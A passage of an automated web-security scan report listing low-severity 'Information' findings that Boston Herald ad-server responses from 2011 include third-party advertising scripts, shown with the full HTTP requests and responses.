GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.295. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.296. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.297. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.298. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.299. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.300. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.89.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:45:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1481
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?" type="text/javascript"></script>
...[SNIP]...

18.301. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.302. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.197.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:16:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1995531146/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=1995531146?" type="text/javascript"></script>
...[SNIP]...

18.303. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.155.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P2021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?" type="text/javascript"></script>
...[SNIP]...

18.304. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P2021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.167.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:31:59 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1488
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?" type="text/javascript"></script>
...[SNIP]...

18.305. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1484
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?" type="text/javascript"></script>
...[SNIP]...

18.306. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.56.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:00:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48|P1021J4T; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1481
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?" type="text/javascript"></script>
...[SNIP]...

18.307. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
